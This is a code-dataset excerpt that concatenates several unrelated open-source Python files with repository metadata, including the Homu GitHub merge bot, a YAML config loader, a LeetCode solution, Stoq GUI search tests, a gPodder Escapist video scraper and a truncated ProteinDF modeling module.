utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', desc, context='homu')
state.add_comment(':hourglass: ' + desc)
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
return False
state.test_started = time.time()
state.set_status('pending')
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))
utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'):
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by:
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
mergeable = state.get_repo().pull_request(state.num).mergeable
if mergeable is None:
time.sleep(5)
mergeable = state.get_repo().pull_request(state.num).mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat: issue_or_commit = '#' + mat.group(1)
else: issue_or_commit = cause['sha'][:7]
else:
issue_or_commit = ''
state.add_comment(':umbrella: The latest upstream changes{} made this pull request unmergeable. Please resolve the merge conflicts.'.format(
' (presumably {})'.format(issue_or_commit) if issue_or_commit else '',
))
state.set_mergeable(mergeable, que=False)
        except Exception:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def check_timeout(states, queue_handler):
while True:
try:
for repo_label, repo_states in states.items():
for num, state in repo_states.items():
if state.status == 'pending' and time.time() - state.test_started >= TEST_TIMEOUT:
print('* Test timed out: {}'.format(state))
state.merge_sha = ''
state.save()
state.set_status('failure')
desc = 'Test timed out'
utils.github_create_status(state.get_repo(), state.head_sha, 'failure', '', desc, context='homu')
state.add_comment(':boom: {}'.format(desc))
queue_handler()
        except Exception:
print('* Error while checking timeout')
traceback.print_exc()
finally:
time.sleep(3600)
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels):
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = repo
for pull in repo.iter_pulls(state='open'):
db_query(db, 'SELECT status FROM pull WHERE repo = ? AND num = ?', [repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repos)
state.title = pull.title
state.body = pull.body
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
db,
states,
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def arguments():
    parser = argparse.ArgumentParser(
        description='A bot that integrates with GitHub and '
                    'your favorite continuous integration service')
parser.add_argument('-v', '--verbose',
action='store_true', help='Enable more verbose logging')
return parser.parse_args()
def main():
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
try:
with open('cfg.toml') as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
try: user_email = [x for x in gh.iter_emails() if x['primary']][0]['email']
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted')
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user.name if user.name else user.login,
'email': user_email,
'ssh_key': cfg.get('git', {}).get('ssh_key', ''),
'local_git': cfg.get('git', {}).get('local_git', False),
}
db_conn = sqlite3.connect('main.db', check_same_thread=False, isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
repo_states = {}
repos[repo_label] = None
db_query(db, 'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha FROM pull WHERE repo = ?', [repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha in db.fetchall():
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repos)
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = bool(rollup)
state.delegate = delegate
if merge_sha:
if 'buildbot' in repo_cfg:
builders = repo_cfg['buildbot']['builders']
elif 'travis' in repo_cfg:
builders = ['travis']
elif 'status' in repo_cfg:
builders = ['status']
else:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(db, 'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res: raise KeyError
if state.merge_sha != merge_sha: raise KeyError
except KeyError:
db_query(db, 'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', [repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try: state = states[repo_label][num]
except KeyError:
db_query(db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?', [repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg)
os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py')
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs, repos, logger, buildbot_slots, my_username, db, repo_labels, mergeable_que, gh]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
Thread(target=check_timeout, args=[states, queue_handler]).start()
queue_handler()
if __name__ == '__main__':
main()
|
barosl/homu
|
homu/main.py
|
Python
|
mit
| 37,593 | 0.003937 |
__author__ = 'Fabrizio Lungo <fab@lungo.co.uk>'
import os
import yaml
from __exceptions__.FileNotFound import FileNotFound
from section import ConfigurationSection
class Configuration(ConfigurationSection):
def __init__(self, fn='config.yml', name=None, create=False):
self._fn = fn
self._create = create
self.reload()
if name is None:
name=fn
self._name = name
def reload(self):
if self._create and not os.path.exists(self._fn):
self._config = {}
elif os.path.exists(self._fn):
with open(self._fn, "r") as f:
                # safe_load avoids constructing arbitrary Python objects from YAML
                self._config = yaml.safe_load(f)
else:
raise FileNotFound(filename=self._fn)
def save(self):
with open(self._fn, "w") as f:
yaml.dump(self._config, f)
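# Hedged usage sketch (the filename is invented; attribute-style access on the
# result comes from ConfigurationSection):
#
#     cfg = Configuration(fn='app.yml', create=True)
#     cfg.reload()  # re-read the YAML file from disk
#     cfg.save()    # dump the in-memory mapping back to the file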
|
flungo/python-yaml-config
|
lib/yamlconfig/config.py
|
Python
|
mit
| 821 | 0.002436 |
class Solution(object):
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        # XOR all indices 0..n with all values; identical pairs cancel
        # (a ^ a == 0), leaving only the missing number.
        xor = len(nums)
        for i, n in enumerate(nums):
            xor ^= n
            xor ^= i
        return xor
inputs = [
[0],
[1],
[3,0,1],
[9,6,4,2,3,5,7,0,1]
]
s = Solution()
for i in inputs:
print s.missingNumber(i)
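# Expected output, i.e. the missing number for each list above:
#     1
#     0
#     2
#     8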
|
daicang/Leetcode-solutions
|
268-missing-number.py
|
Python
|
mit
| 388 | 0.028351 |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import datetime
import locale
import mock
import os
import unittest
from dateutil import relativedelta
from dateutil.relativedelta import SU, MO, SA, relativedelta as delta
from stoqlib.api import api
from stoqlib.domain.product import Product
from stoqlib.domain.test.domaintest import DomainTest
from stoqlib.gui.editors.producteditor import ProductEditor
from stoqlib.gui.events import SearchDialogSetupSearchEvent
from stoqlib.gui.search.productsearch import ProductSearch
from stoqlib.gui.search.searchextension import SearchExtension
from stoqlib.gui.search.searchcolumns import SearchColumn, QuantityColumn
from stoqlib.gui.search.searchdialog import SearchDialog
from stoqlib.gui.search.searchfilters import (StringSearchFilter, DateSearchFilter,
ComboSearchFilter, NumberSearchFilter)
from stoqlib.gui.search.searchoptions import (ThisWeek, LastWeek, NextWeek, ThisMonth,
LastMonth, NextMonth)
from stoqlib.gui.test.uitestutils import GUITest
from stoqlib.lib.defaults import get_weekday_start
from stoqlib.lib.introspection import get_all_classes
class TestDateOptions(unittest.TestCase):
def setUp(self):
self._original_locale = locale.getlocale(locale.LC_ALL)
def tearDown(self):
self._set_locale(self._original_locale)
def _get_week_interval(self, today):
weekday = get_weekday_start()
start = today + delta(weekday=weekday(-1))
end = start + delta(days=+6)
return start, end
def _get_month_interval(self, today):
start = today + delta(day=1)
end = start + delta(day=31)
return start, end
def _get_locales(self):
# en_US: week starts on sunday
# es_ES: week starts on monday
return ["en_US.UTF-8", "es_ES.UTF-8"]
def _starts_on_sunday(self, loc):
return loc.startswith("en_US")
def _set_locale(self, loc):
try:
loc = locale.setlocale(locale.LC_ALL, loc)
except locale.Error:
# Some locales could not be available on user's machine, leading
# him to a false positive broke test, so skip it, informing the
# problem.
raise unittest.SkipTest("Locale %s not available" % (loc, ))
else:
os.environ['LC_ALL'] = loc
def _testWeekday(self, loc, interval):
if self._starts_on_sunday(loc):
self.assertEqual(
relativedelta.weekday(interval[0].weekday()), SU)
self.assertEqual(
relativedelta.weekday(interval[1].weekday()), SA)
else:
self.assertEqual(
relativedelta.weekday(interval[0].weekday()), MO)
self.assertEqual(
relativedelta.weekday(interval[1].weekday()), SU)
def test_this_week(self):
option = ThisWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
self.assertEqual(option.get_interval(),
self._get_week_interval(get_today_date()))
self._testWeekday(loc, option.get_interval())
def test_last_week(self):
option = LastWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
last_week_day = get_today_date() + delta(weeks=-1)
self.assertEqual(option.get_interval(),
self._get_week_interval(last_week_day))
self._testWeekday(loc, option.get_interval())
def test_next_week(self):
option = NextWeek()
for loc in self._get_locales():
self._set_locale(loc)
# starting in 2008/01/01, wednesday
for i in range(1, 8):
get_today_date = lambda: datetime.date(2008, 1, i)
option.get_today_date = get_today_date
next_week_day = get_today_date() + delta(weeks=+1)
self.assertEqual(option.get_interval(),
self._get_week_interval(next_week_day))
self._testWeekday(loc, option.get_interval())
def test_this_month(self):
option = ThisMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
self.assertEqual(option.get_interval(),
self._get_month_interval(month_day))
def test_last_month(self):
option = LastMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
last_month_day = month_day + delta(months=-1)
self.assertEqual(option.get_interval(),
self._get_month_interval(last_month_day))
def test_next_month(self):
option = NextMonth()
for loc in self._get_locales():
self._set_locale(loc)
for month_day in [datetime.date(2007, 1, 1),
datetime.date(2007, 1, 15),
datetime.date(2007, 1, 31)]:
option.get_today_date = lambda: month_day
next_month_day = month_day + delta(months=+1)
self.assertEqual(option.get_interval(),
self._get_month_interval(next_month_day))
class TestSearchEditor(GUITest):
"""Tests for SearchEditor"""
@mock.patch('stoqlib.gui.search.searcheditor.api.new_store')
@mock.patch('stoqlib.gui.search.searcheditor.run_dialog')
def test_run_editor(self, run_dialog, new_store):
run_dialog.return_value = True
new_store.return_value = self.store
dialog = ProductSearch(store=self.store)
dialog.search.refresh()
dialog.results.select(dialog.results[0])
product = dialog.results[0].product
with mock.patch.object(self.store, 'commit'):
with mock.patch.object(self.store, 'close'):
self.click(dialog._toolbar.edit_button)
run_dialog.assert_called_once_with(ProductEditor, dialog,
self.store, product,
visual_mode=False)
class TestSearchEvent(GUITest):
def test_search_dialog_setup_search(self):
class ProductSearchExtention(SearchExtension):
spec_attributes = dict(ncm=Product.ncm)
def get_columns(self):
return [SearchColumn('ncm', title='NCM', data_type=str)]
def _setup_search(dialog):
return dialog.add_extension(ProductSearchExtention())
        # At least one product should have an NCM value, so we can verify the
# results.
product = self.store.find(Product).order_by(Product.te_id).first()
product.ncm = u'12345678'
SearchDialogSetupSearchEvent.connect(_setup_search)
dialog = ProductSearch(self.store)
dialog.search.refresh()
self.check_search(dialog, 'product-search-extended')
class TestQuantityColumn(GUITest):
def test_format_func(self):
class Fake(object):
quantity = 0
column = QuantityColumn('quantity')
obj = Fake()
obj.quantity = None
self.assertEquals(column._format_func(obj, True), '0')
obj.quantity = 0
self.assertEquals(column._format_func(obj, True), '0')
obj.quantity = 1
self.assertEquals(column._format_func(obj, True), '1')
obj.product = self.create_product()
obj.sellable = obj.product.sellable
# Without a unit, it should still return just the number
obj.quantity = 1
self.assertEquals(column._format_func(obj, True), '1')
obj.sellable.unit = self.create_sellable_unit(u'Pc')
self.assertEquals(column._format_func(obj, True), '1 Pc')
obj.product.manage_stock = False
self.assertEquals(column._format_func(obj, True), '1 Pc')
obj.quantity = 0
self.assertEquals(column._format_func(obj, True), u"\u221E")
class TestSearchGeneric(DomainTest):
"""Generic tests for searches"""
    # Those are base classes for other searches, and should not be instantiated
ignored_classes = [
'_BaseBillCheckSearch',
'SearchEditor',
'BasePersonSearch',
]
@classmethod
def _get_all_searches(cls):
for klass in get_all_classes('stoqlib/gui'):
try:
if klass.__name__ in cls.ignored_classes:
continue
# Exclude SearchDialog, since we just want to test it's subclasses
if not issubclass(klass, SearchDialog) or klass is SearchDialog:
continue
except TypeError:
continue
yield klass
def _test_search(self, search_class):
        # XXX: If we use self.store, all of these tests pass, but the test
        # executed after this one will break with
# storm.exceptions.ClosedError('Connection is closed',)
store = api.new_store()
if search_class.__name__ == 'ProductBranchSearch':
from stoqlib.domain.product import Storable
# This dialog must have a storable to be able to search it in stock
storable = store.find(Storable).any()
dialog = search_class(store, storable)
else:
dialog = search_class(store)
# There may be no results in the search, but we only want to check if
# the query is executed properly
dialog.search.refresh()
# Testing SearchColumns only makes sense if advanced search is enabled
if not dialog.search.menu:
return
columns = dialog.search.result_view.get_columns()
for i in columns:
if not isinstance(i, SearchColumn):
continue
filter = dialog.search.add_filter_by_attribute(
i.search_attribute, i.get_search_label(),
i.data_type, i.valid_values, i.search_func, i.use_having)
            # Set some value in the filter, so that it actually is included in
# the query
if isinstance(filter, StringSearchFilter):
filter.set_state('foo')
elif isinstance(filter, DateSearchFilter):
filter.set_state(datetime.date(2012, 1, 1),
datetime.date(2012, 10, 10))
elif isinstance(filter, NumberSearchFilter):
filter.set_state(1, 3)
elif isinstance(filter, ComboSearchFilter):
for key, value in filter.combo.get_model_items().items():
if value:
filter.set_state(value)
break
dialog.search.refresh()
# Remove the filter so it wont affect other searches
filter.emit('removed')
store.close()
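# Generate one concrete test method per SearchDialog subclass found above.
# Binding the class through the default argument `v` gives each generated
# function its own search class instead of the loop variable's final value.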
for search in TestSearchGeneric._get_all_searches():
name = 'test' + search.__name__
func = lambda s, v=search: TestSearchGeneric._test_search(s, v)
func.__name__ = name
setattr(TestSearchGeneric, name, func)
del func
|
andrebellafronte/stoq
|
stoqlib/gui/test/test_search.py
|
Python
|
gpl-2.0
| 12,901 | 0.001783 |
# -*- coding: utf-8 -*-
"""
Production settings file for project 'project'
"""
from project.settings import *
DEBUG = False
SITE_DOMAIN = 'sveetch.github.io/Sveetoy'
# Directory where all stuff will be builded
PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs')
# Path where will be moved all the static files, usually this is a directory in
# the ``PUBLISH_DIR``
STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static')
|
sveetch/Sveetoy
|
project/githubpages_settings.py
|
Python
|
mit
| 428 | 0 |
from pudzu.charts import *
df = pd.read_csv("datasets/flagstriband.csv")
df = pd.concat([pd.DataFrame(df.colours.apply(list).tolist(), columns=list("TMB")), df], axis=1).set_index("colours")
FONT, SIZE = calibri, 24
fg, bg = "black", "#EEEEEE"
default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg"
COLORS = { "W": "white", "Y": "yellow", "R": "red", "G": "green", "B": "blue", "K": "black", }
W, H = 320, 200
def label(c, size):
w, h = size
label = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, bold=True), beard_line=True)
description = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, italics=True), beard_line=True)
if c == "Y":
flag = Triangle(max(w,h), "orange", "yellow", p=1.0).crop_to_aspect(w,h).trim(1).pad(1, "grey")
else:
flag = Rectangle((w-2, h-2), RGBA(COLORS.get(c)).blend(bg, 0.1)).pad(1, "grey")
return Image.from_column([label, description, flag], padding=2, bg=bg)
def process(d):
if non(d['name']): return None
label = Image.from_text_bounded(d['name'].replace("*","").upper(), (W,H), SIZE, partial(FONT, bold=True), beard_line=True)
description = Image.from_text_bounded(get_non(d, 'description', " "), (W,H), SIZE, partial(FONT, italics=True), beard_line=True)
flag = Image.from_url_with_cache(get_non(d, 'flag', default_img)).to_rgba()
flag = flag.resize_fixed_aspect(height=H-2) if flag.width / flag.height < 1.3 else flag.resize((W-2,H-2))
flag = flag.pad(1, "grey")
flaglabel = Image.from_column([label, description, flag], padding=2, bg=bg)
if "*" in d['name']: flaglabel = flaglabel.blend(Rectangle(flaglabel.size, bg), 0.3)
return flaglabel
def grid(middle):
ms = df[df.M == middle]
colors = "".join(COLORS).replace(middle,"")
array = [[dict(ms.loc[b+middle+t][["name", "description", "flag"]]) for b in colors] for t in colors]
data = pd.DataFrame(array, index=list(colors), columns=list(colors))
grid = grid_chart(data, process, padding=(10,20), fg=fg, bg=bg, yalign=1,
row_label=lambda row: label(data.index[row], (100, H)), col_label=lambda col: label(data.columns[col], (W,100)), corner_label=label(middle, (100,100)))
return grid
PAD = 100
grids = list(generate_batches([grid(c) for c in COLORS], 2))
grid = Image.from_array(grids, padding=(PAD,PAD//2), bg=bg)
title = Image.from_column([
Image.from_text_bounded("From Austria to Zanzibar".upper(), grid.size, 360, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)),
Image.from_text_bounded("a catalog of horizontal triband flags".upper(), grid.size, 240, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)),
], padding=0)
img = Image.from_column([title, grid], bg=bg, padding=(20,0)).pad(10, bg)
img.place(Image.from_text("/u/Udzu", FONT(48), fg=fg, bg=bg, padding=10).pad((2,2,0,0), fg), align=1, padding=10, copy=False)
img.save("output/flagstriband.png")
img.resize_fixed_aspect(scale=0.5).save("output/flagstriband2.png")
|
Udzu/pudzu
|
dataviz/flagstriband.py
|
Python
|
mit
| 3,039 | 0.014149 |
# -*- coding: utf-8 -*-
#
# gPodder - A media aggregator and podcast client
# Copyright (c) 2005-2014 Thomas Perl and the gPodder Team
#
# gPodder is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# gPodder is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# gpodder.escapist - Escapist Videos download magic
# somini <somini29@yandex.com>; 2014-09-14
#
import gpodder
from gpodder import util
import logging
logger = logging.getLogger(__name__)
try:
# For Python < 2.6, we use the "simplejson" add-on module
import simplejson as json
except ImportError:
# Python 2.6 already ships with a nice "json" module
import json
import re
# This matches the more reliable URL
ESCAPIST_NUMBER_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/(\d+)', re.IGNORECASE)
# This matches regular URL, mainly those that come in the RSS feeds
ESCAPIST_REGULAR_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/([\w-]+)/(\d+)-', re.IGNORECASE)
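# Example matches (illustrative URLs only):
#   http://www.escapistmagazine.com/videos/view/1234 -> ESCAPIST_NUMBER_RE, group(1) == '1234'
#   http://www.escapistmagazine.com/videos/view/some-show/1234-title -> ESCAPIST_REGULAR_RE, group(2) == '1234'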
# This finds the RSS for a given URL
DATA_RSS_RE = re.compile(r'http://www.escapistmagazine.com/rss/videos/list/([1-9][0-9]*)\.xml')
# This matches the flash player's configuration. It's a JSON, but it's always malformed
DATA_CONFIG_RE = re.compile(r'flashvars=.*config=(http.*\.js)', re.IGNORECASE)
# This matches the actual MP4 url, inside the "JSON"
DATA_CONFIG_DATA_RE = re.compile(r'http[:/\w.?&-]*\.mp4')
# This matches the cover art for an RSS. We shouldn't parse XML with regex.
DATA_COVERART_RE = re.compile(r'<url>(http:.+\.jpg)</url>')
class EscapistError(Exception): pass
def get_real_download_url(url):
video_id = get_escapist_id(url)
if video_id is None:
return url
web_data = get_escapist_web(video_id)
data_config_frag = DATA_CONFIG_RE.search(web_data)
if data_config_frag is None:
raise EscapistError('Cannot get flashvars URL from The Escapist')
data_config_url = data_config_frag.group(1)
logger.debug('Config URL: %s', data_config_url)
data_config_data = util.urlopen(data_config_url).read().decode('utf-8')
data_config_data_frag = DATA_CONFIG_DATA_RE.search(data_config_data)
if data_config_data_frag is None:
raise EscapistError('Cannot get configuration JS from The Escapist')
real_url = data_config_data_frag.group(0)
if real_url is None:
raise EscapistError('Cannot get MP4 URL from The Escapist')
elif "-ad-rotation/" in real_url:
raise EscapistError('Oops, seems The Escapist blocked this IP. Wait a few days/weeks to get it unblocked')
else:
return real_url
def get_escapist_id(url):
result = ESCAPIST_NUMBER_RE.match(url)
if result is not None:
return result.group(1)
result = ESCAPIST_REGULAR_RE.match(url)
if result is not None:
return result.group(2)
return None
def is_video_link(url):
return (get_escapist_id(url) is not None)
def get_real_channel_url(url):
video_id = get_escapist_id(url)
if video_id is None:
return url
web_data = get_escapist_web(video_id)
data_config_frag = DATA_RSS_RE.search(web_data)
if data_config_frag is None:
raise EscapistError('Cannot get RSS URL from The Escapist')
return data_config_frag.group(0)
def get_real_cover(url):
rss_url = get_real_channel_url(url)
if rss_url is None:
return None
rss_data = util.urlopen(rss_url).read()
rss_data_frag = DATA_COVERART_RE.search(rss_data)
if rss_data_frag is None:
return None
return rss_data_frag.group(1)
def get_escapist_web(video_id):
if video_id is None:
return None
web_url = 'http://www.escapistmagazine.com/videos/view/%s' % video_id
return util.urlopen(web_url).read()
|
somini/gpodder
|
src/gpodder/escapist_videos.py
|
Python
|
gpl-3.0
| 4,242 | 0.003772 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2014 The ProteinDF development team.
# see also AUTHORS and README if provided.
#
# This file is a part of the ProteinDF software package.
#
# The ProteinDF is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# The ProteinDF is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ProteinDF. If not, see <http://www.gnu.org/licenses/>.
from .superposer import Superposer
from .matrix import Matrix
from .atomgroup import AtomGroup
from .atom import Atom
from .functions import load_msgpack
from .position import Position
from .error import BrInputError
# from .xyz import Xyz
import os
import math
import re
import logging
logger = logging.getLogger(__name__)
class Modeling:
_ACE_ALA_NME_path_base = os.path.join(
os.environ.get('PDF_HOME', '.'),
'data',
"ACE_ALA_NME_{}.brd")
_ACE_ALA_NME_comformers = ["trans1", "trans2", "cis1", "cis2"]
def __init__(self):
self._ACE_ALA_NME = {}
for comformer in self._ACE_ALA_NME_comformers:
brd_path = self._ACE_ALA_NME_path_base.format(comformer)
# print(comformer, brd_path)
atomgroup = AtomGroup(load_msgpack(brd_path))
assert(atomgroup.get_number_of_all_atoms() > 0)
self._ACE_ALA_NME[comformer] = atomgroup
def _get_ACE_ALA_NME(self, comformer):
assert(comformer in self._ACE_ALA_NME_comformers)
return self._ACE_ALA_NME[comformer]
# -----------------------------------------------------------------
def get_ACE_simple(self, next_aa):
"""
        Turn the neighboring C-alpha position into a methyl group.
"""
answer = AtomGroup()
CAs = next_aa.pickup_atoms('CA')
if len(CAs) > 0:
answer.set_atom('CA', CAs[0])
else:
            raise BrInputError(next_aa,
                               'cannot find "CA" atom when building ACE.')
Cs = next_aa.pickup_atoms('C')
if len(Cs) > 0:
